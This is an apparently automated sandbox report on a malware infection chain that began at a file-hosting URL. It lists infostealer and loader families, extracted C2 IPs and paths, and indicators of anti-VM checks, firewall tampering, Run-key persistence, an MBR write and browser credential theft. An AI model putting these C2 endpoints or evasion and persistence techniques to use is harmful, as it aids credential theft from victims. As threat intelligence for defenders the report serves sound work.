privateloader | hxxp://turbobit[.]net

Analysis

max time kernel
630s
max time network
1159s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
19/07/2024, 08:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://turbobit.net

Score

10^/10

privateloader redline risepro stealc tofsee default logsdiller cloud (tg: @logsdillabot)bootkit discovery evasion execution infostealer loader persistence privilege_escalation spyware stealer themida trojan

Malware Config

Extracted

Family

stealc

Botnet

default

http://85.28.47.31

Attributes

url_path
/5499d72b3a3e55be.php

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

77.105.135.107:3445

Extracted

Family

risepro

194.110.13.70

77.105.133.27

Signatures

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/6120-2659-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	UXEZ13dcixfxO3xLyNbEfiBU.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3928	powershell.EXE
5096	powershell.exe
5180	powershell.EXE
5540	powershell.exe
2936	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1560	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	UXEZ13dcixfxO3xLyNbEfiBU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	UXEZ13dcixfxO3xLyNbEfiBU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	T0qJC09GvDEuSkMeGFLdaMFx.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk	UXEZ13dcixfxO3xLyNbEfiBU.exe

Executes dropped EXE 22 IoCs

pid	Process
976	setup.exe
4220	setup.exe
5580	T0qJC09GvDEuSkMeGFLdaMFx.exe
4552	v40EpIKMih9Aj2cY77veyjMv.exe
6000	eIDDb3XYxvYHWrDy5a12tKEm.exe
4584	0bhjjDkdpE9G15ynZICCXL2r.exe
1180	17XdHxjg4RYuOASnCjvnJ40P.exe
568	2qaB5SgEOmYhO2un5YlD5_Co.exe
5936	xdMbQGthmM5A5ydjQA8PDq6k.exe
2344	UXEZ13dcixfxO3xLyNbEfiBU.exe
1548	2uWT3i9q6WVc78KsAIFaSXBv.exe
6104	bjWxSkKqXMR7odWAJEcWxhoj.exe
4568	towmbSBzenOBl3_jr7QhnVTj.exe
5700	CoqwRomIrFLLCP5o_FouY1Mj.exe
5500	CoqwRomIrFLLCP5o_FouY1Mj.tmp
2576	Install.exe
112	Install.exe
3264	audiooutputswitcher.exe
2180	audiooutputswitcher.exe
5168	Install.exe
3136	Install.exe
1236	jhrsuqtz.exe

Loads dropped DLL 1 IoCs

pid	Process
5500	CoqwRomIrFLLCP5o_FouY1Mj.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0007000000023703-2380.dat	themida
behavioral1/memory/2344-2454-0x0000000000D80000-0x000000000170F000-memory.dmp	themida
behavioral1/memory/2344-2464-0x0000000000D80000-0x000000000170F000-memory.dmp	themida
behavioral1/memory/2344-2463-0x0000000000D80000-0x000000000170F000-memory.dmp	themida
behavioral1/memory/2344-2466-0x0000000000D80000-0x000000000170F000-memory.dmp	themida
behavioral1/memory/2344-2467-0x0000000000D80000-0x000000000170F000-memory.dmp	themida
behavioral1/memory/2344-2461-0x0000000000D80000-0x000000000170F000-memory.dmp	themida
behavioral1/memory/2344-2462-0x0000000000D80000-0x000000000170F000-memory.dmp	themida
behavioral1/memory/2344-3268-0x0000000000D80000-0x000000000170F000-memory.dmp	themida

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	185.228.168.9
Destination IP	141.98.234.31
Destination IP	185.228.168.9

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe"	UXEZ13dcixfxO3xLyNbEfiBU.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	UXEZ13dcixfxO3xLyNbEfiBU.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
637	iplogger.org
639	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
592	api.myip.com
593	api.myip.com
594	ipinfo.io
595	ipinfo.io

Power Settings 1 TTPs 52 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5384	powercfg.exe
4208	powercfg.exe
1548	powercfg.exe
2936	powercfg.exe
636	powercfg.exe
5128	powercfg.exe
1384	powercfg.exe
1220	powercfg.exe
1396	powercfg.exe
4964	powercfg.exe
1488	powercfg.exe
5568	powercfg.exe
3128	powercfg.exe
4880	powercfg.exe
2680	powercfg.exe
5064	powercfg.exe
2404	powercfg.exe
4544	powercfg.exe
5280	powercfg.exe
2960	powercfg.exe
3828	powercfg.exe
4576	powercfg.exe
3852	powercfg.exe
968	powercfg.exe
5420	powercfg.exe
5276	powercfg.exe
5976	powercfg.exe
3368	powercfg.exe
5788	powercfg.exe
2412	powercfg.exe
4880	powercfg.exe
2900	powercfg.exe
5632	powercfg.exe
1824	powercfg.exe
1960	powercfg.exe
5848	powercfg.exe
5112	powercfg.exe
1672	powercfg.exe
3876	powercfg.exe
2752	powercfg.exe
5804	powercfg.exe
3908	powercfg.exe
5932	powercfg.exe
1192	powercfg.exe
1748	powercfg.exe
4748	powercfg.exe
3332	powercfg.exe
848	powercfg.exe
2200	powercfg.exe
400	powercfg.exe
692	powercfg.exe
3284	powercfg.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	0bhjjDkdpE9G15ynZICCXL2r.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
6000	eIDDb3XYxvYHWrDy5a12tKEm.exe
2344	UXEZ13dcixfxO3xLyNbEfiBU.exe
6000	eIDDb3XYxvYHWrDy5a12tKEm.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1548 set thread context of 5608	1548	2uWT3i9q6WVc78KsAIFaSXBv.exe	232
PID 568 set thread context of 5528	568	2qaB5SgEOmYhO2un5YlD5_Co.exe	233
PID 1180 set thread context of 6120	1180	17XdHxjg4RYuOASnCjvnJ40P.exe	237
PID 4552 set thread context of 5076	4552	v40EpIKMih9Aj2cY77veyjMv.exe	239

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\7-Zip\Lang\af.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\pt-br.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ro.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\da.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\fr.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ku.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\sq.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\zh-cn.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\7z.sfx	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\an.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\bg.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\sk.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ug.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\uz.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ko.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\nl.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\fur.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\id.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\is.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\sa.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\si.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\7-zip.dll	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\lv.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\sl.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\zh-tw.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ka.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\yo.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ar.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ca.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\he.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ky.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\en.ttt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\fi.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\hi.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\io.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ku-ckb.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\tr.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\cs.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\hy.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ja.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\vi.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\7zCon.sfx	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\License.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\de.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\kaa.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\bn.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\co.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\fa.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\pl.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ta.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\eo.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\lt.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\mk.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\mng2.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ne.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\7zFM.exe	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\7-zip.chm	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ast.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\es.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ext.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\hr.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\be.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\lij.txt	msiexec.exe
File created	C:\Program Files (x86)\7-Zip\Lang\hu.txt	msiexec.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bmEYWRTMKrukfekPRJ.job	schtasks.exe
File created	C:\Windows\Tasks\bTVQzzKDZQMhkLPDbz.job	schtasks.exe
File opened for modification	C:\Windows\Installer\e5d9cdf.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\e5d9ce3.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{23170F69-40C1-2701-2401-000001000000}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9E56.tmp	msiexec.exe
File created	C:\Windows\Installer\e5d9cdf.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe

Launches sc.exe 7 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2356	sc.exe
4436	sc.exe
5664	sc.exe
5008	sc.exe
5504	sc.exe
6008	sc.exe
5644	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 9 IoCs

pid	pid_target	Process	procid_target
2916	5580	WerFault.exe	216
5556	1236	WerFault.exe	271
4272	4604	WerFault.exe	322
2616	1504	WerFault.exe	315
4020	4556	WerFault.exe	437
1344	5748	WerFault.exe	417
5880	5748	WerFault.exe	417
2360	3136	WerFault.exe	244
4008	5168	WerFault.exe	243

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000009bb5e1a71ba8e530000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000009bb5e1a0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090009bb5e1a000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d09bb5e1a000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000009bb5e1a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2504	timeout.exe
552	timeout.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe

Modifies registry class 39 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files (x86)\\7-Zip\\7-zip.dll"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\7-Zip	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Directory\shellex\ContextMenuHandlers\7-Zip	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\Program = "Complete"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Net\1 = "C:\\Users\\Admin\\Downloads\\"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Downloads\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\Complete	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\PackageCode = "96F071321C0410724210000020000000"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\PackageName = "7z2401.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Directory\shellex\DragDropHandlers\7-Zip	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\96F071321C0410720000000040000000\96F071321C0410724210000010000000	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Folder\shellex\ContextMenuHandlers\7-Zip	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\96F071321C0410720000000040000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3419463127-3903270268-2580331543-1000\{55EE6E5D-2A6E-48CE-A8C2-182E7B9C2304}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Drive\shellex\DragDropHandlers\7-Zip	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\ProductName = "7-Zip 24.01"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Version = "402718720"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\LanguageFiles = "Complete"	msiexec.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 802584.crdownload:SmartScreen	msedge.exe

